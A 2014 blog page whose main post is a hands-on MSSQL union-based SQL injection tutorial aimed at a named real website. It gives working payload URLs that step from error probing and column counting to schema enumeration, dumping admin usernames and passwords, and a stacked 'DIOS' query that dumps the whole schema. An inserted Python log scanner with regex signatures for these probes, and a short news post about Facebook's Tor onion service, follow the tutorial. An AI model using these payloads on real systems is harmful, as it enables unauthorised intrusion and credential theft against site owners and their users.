Saturday 15 November 2014

Step by Step MSSQL UNION BASED INJECTION


In the Name of ALLAH, the Most Beneficent and the Merciful.

So today I am going to write a tutorial on MSSQL injection. Hope you like it. But first I suggest you read the basics of SQL injection.
So let's start...

For this tutorial we will use this site:

http://aquaservices.co.in/Product.aspx?Id=13

First the checking. The first step is the same as in MySQL: put a single quote ( ' ) and then a double quote ( " ) after the parameter and watch for errors. From that I came to know this one is a single-quote-based injection.

http://aquaservices.co.in/Product.aspx?Id=13'

It shows an error like this.
 


INFORMATION:
When both the single quote and the double quote give an error, there is a high probability that the injection is integer based. With a single-quote-based injection the double quote does not give an error, with a double-quote-based injection the single quote does not give an error, and when both the single quote and the double quote give an error, apply the golden rule that the injection is integer type.

Now we need to find the comment syntax for MSSQL.

Let's try with the basics (--):
http://aquaservices.co.in/Product.aspx?Id=13--

The page loads, but its contents are missing.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1 --

Same as above.

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--

Error:
"The ORDER BY position number 100 is out of range of the number of items in the select list."
  



Now we continue with ORDER BY, and at last we come to know that 8 is the last working column. The next part is using the UNION SELECT query.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--


What? We got an error again.

Operand type clash: text is incompatible with int
 


In case of such errors in a UNION SELECT statement we have the option to use NULL in all columns, so let's try that shit.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

We got another error:
  

The text data type cannot be selected as DISTINCT because it is not comparable.

Here's one more type of error you can find while doing MSSQL injection. The solution is simply to use "Union All Select" in place of "Union Select". Let's try that shit again.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again an error.. >.<

Conversion from type 'DBNull' to type 'String' is not valid.


The solution to this type of error: here we can see a DBNull-to-String mismatch, so we have to convert each column one by one and see if we can make it work. To put a string we can use single quotes, but I prefer using the db_name() function to avoid some errors. Here we have eight columns; changing each column one by one is easy, but it could be a pain when there are 20 or more columns, so my friend Zenodermus Javanicus developed a payload generator to make that easy for us. I am going to generate the payloads which put db_name() in the eight columns one by one.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--

Error: Operand type clash: text is incompatible with int (so it's better to leave this column as int only).

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--

Here we can see the second column getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,7,db_name()--

Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the database name in the error.)

There are many other ways to collect more information from MSSQL; some are given here.
Let's try...

We can put @@version in place of the vulnerable column to get the current version of the database.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

Success.
  

Now we will extract the table names. Here the syntax is different from MySQL because MSSQL has no LIMIT clause (the queries below use a TOP n subquery instead).


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name: AdminLogin

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name: Certificate

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the fourth table name: ClientList


In the same manner we can get all the tables one by one. Now let's get the columns. I will extract the columns from the AdminLogin table.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from the AdminLogin table: IsActive

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the second column from the AdminLogin table: Password

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the third column from the AdminLogin table: UserName

We got the table names and the column names; now let's extract the data from them. For concatenation we can use %2b, which is the URL encoding of +.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

At the end I would like to show you a DIOS (dump in one shot query) made by my friend Zenodermus Javanicus, which makes the process a lot faster.

http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN ::
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name)
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : '
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give an error, but actually it is creating the DIOS table, so now let's check the output under temp_dios_sample.
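From the defender's side, the whole walkthrough above leaves a very recognisable trail in the web server log: a quote probe, ORDER BY column counting, UNION ALL SELECT with db_name()/@@version/information_schema, and finally a stacked batch starting with ";begin declare". The Python scanner below is an added example, not code from this post or from the site it targets; the log lines, IP addresses and timestamps are constructed, only the parameter name Id comes from the page, and the signature list is my own heuristic.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines modelled on the probes shown above; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2014:10:01:02 +0000] "GET /Product.aspx?Id=13 HTTP/1.1" 200 5120
203.0.113.5 - - [15/Nov/2014:10:01:09 +0000] "GET /Product.aspx?Id=13' HTTP/1.1" 500 812
203.0.113.5 - - [15/Nov/2014:10:01:20 +0000] "GET /Product.aspx?Id=13%20order%20by%20100-- HTTP/1.1" 500 790
203.0.113.5 - - [15/Nov/2014:10:02:41 +0000] "GET /Product.aspx?Id=13%20and%200=1%20Union%20All%20Select%201,@@version,3,4,5,6,db_name(),8-- HTTP/1.1" 200 5300
203.0.113.5 - - [15/Nov/2014:10:03:05 +0000] "GET /Product.aspx?Id=13;begin%20declare%20@x%20varchar(10)%20end-- HTTP/1.1" 500 801
198.51.100.7 - - [15/Nov/2014:10:04:00 +0000] "GET /Product.aspx?Id=14 HTTP/1.1" 200 5110
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Each signature is checked against the URL-decoded, lower-cased parameter value.
SIGNATURES = [
    ("quote_probe",    re.compile(r"^\d+\s*(?:'|\")")),                     # 13'  or  13"
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),                 # column counting
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_read",    re.compile(r"information_schema\.|\bdb_name\s*\(|@@version")),
    ("stacked_query",  re.compile(r";\s*(?:begin|declare|exec)\b")),       # DIOS-style batch
]

def param_value(target, param):
    """Raw (still URL-encoded) value of `param` in the request target, or None."""
    m = re.search(r"[?&]" + re.escape(param) + r"=([^&]*)", target)
    return m.group(1) if m else None

def inspect_value(raw):
    """Tags for one parameter value; an Id that is not a plain integer is flagged first."""
    value = unquote(raw).lower()
    tags = [] if value.strip().isdigit() else ["non_numeric_id"]
    tags += [name for name, rx in SIGNATURES if rx.search(value)]
    return tags

def scan_log(text, param="Id"):
    """Return one finding per request whose `param` value looks like an injection probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = param_value(m.group(2), param)
        tags = inspect_value(raw) if raw is not None else []
        if tags:
            findings.append({"ip": m.group(1), "status": int(m.group(3)),
                             "value": unquote(raw), "tags": tags})
    return findings
```

The "non_numeric_id" check is the one that matters most: the same rule applied inside the application (parse Id as an integer and bind it as a query parameter) removes the entire class of errors the tutorial relies on.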





Hope You Like it.
Thanks.

#stay_connected.

Saturday 1 November 2014

Facebook is now available through Tor


Facebook is now available through Tor for ramped-up privacy

  

The "deep web" is not only home to shady online drug bazaars where you can exchange bitcoins for drugs, but also to portals where whistleblowers can safely pass sensitive documents to journalists.

Now, it's also home to Facebook.

The social network announced on Friday that it is now hosted directly on the Tor network to allow for an even more secure and private way to connect to Facebook.
People using Tor, software that allows for safe and anonymous web browsing, can now connect directly to Facebook using its new onion address (https://facebookcorewwwi.onion/), also known as a hidden service.
"It’s important to us at Facebook to provide methods for people to use our site securely," Alec Muffett, a Facebook security engineer, wrote in a post.
Runa Sandvik, a privacy and security researcher previously employed by the Tor Project, said that the idea of Facebook being hosted on the Tor network came up during a conversation with Muffett.
Previously, users could use Tor to connect to Facebook.com, but they would run into a slew of issues — including getting locked out — because the connection would be routed around the world. Thus, it would appear as though a user was connecting from an unusual location, which Facebook treats as a red flag indicating an account has been hacked.
Now, however, you can log on and register on Facebook over Tor using the .onion site without running into these issues, according to Sandvik. "It does provide another level of protection for users who are already using Tor to log on to Facebook."
Connections to Facebook's .onion URL are also end-to-end encrypted, making it harder for hackers, spies or government officials to see what users do on the social network.
While some reacted with irony, noting that Facebook is usually not the greatest friend to privacy, others applauded the move.
Facebook's announcement comes just a few weeks after the company's latest privacy controversy. In September, some LGBT users complained that Facebook's real-name policy was preventing them from using the network with the name they identify with, even if it's not their legal one. After the uproar, Facebook apologized and hinted that it was going to change the policy.